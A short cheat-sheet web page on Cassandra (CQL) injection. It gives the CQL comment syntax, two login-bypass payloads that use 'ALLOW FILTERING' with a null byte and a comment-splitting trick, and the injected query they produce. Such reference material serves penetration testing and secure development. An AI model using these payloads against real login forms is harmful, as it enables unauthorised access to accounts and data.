Cassandra Injection
Post
Cancel

Cassandra Injection

Cassandra Injection

Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system

Summary

Cassandra comment

1
/* Cassandra Comment */

Cassandra - Login Bypass

Login Bypass 0

1
2
username: admin' ALLOW FILTERING; %00
password: ANY

Login Bypass 1

1
2
username: admin'/*
password: */and pass>'

The injection would look like the following SQL query

1
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;

References

This post is licensed under CC BY 4.0 by the author.